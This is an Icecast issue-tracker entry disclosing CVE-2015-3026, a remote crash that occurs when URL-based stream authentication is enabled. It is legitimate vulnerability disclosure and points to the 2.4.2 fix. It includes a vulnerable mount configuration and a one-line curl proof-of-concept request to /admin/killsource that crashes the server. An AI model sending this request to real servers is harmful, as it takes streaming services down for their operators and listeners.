Xiph.Org issueshttps://gitlab.xiph.org/groups/xiph/-/issues2018-04-16T22:12:13Zhttps://gitlab.xiph.org/xiph/icecast-server/-/issues/2191Icecast can be crashed remotely if stream_auth is enabled.2018-04-16T22:12:13ZThomas B. RückerIcecast can be crashed remotely if stream_auth is enabled.Downstream bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782120
Icecast can be killed by anyone with a simple HTTP request when
<authentication type="url"> is used and a stream_auth handler is
defined.
Example configura...Downstream bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782120
Icecast can be killed by anyone with a simple HTTP request when
<authentication type="url"> is used and a stream_auth handler is
defined.
Example configuration:
```
<mount>
<mount-name>/test.ogg</mount-name>
<authentication type="url">
<option name="stream_auth" value="http://localhost/auth"/>
</authentication>
</mount>
```
Proof of concept exploit:
```
curl "http://stream.example.org:8000/admin/killsource?mount=/test.ogg"
```
This happens if no logon credentials are sent with the request. The crash happens regardless of a source client being connected to the vulnerable mountpoint.
This will be released in a security release 2.4.2 today.
CVE-2015-3026Icecast 2.4.2Thomas B. RückerThomas B. Rücker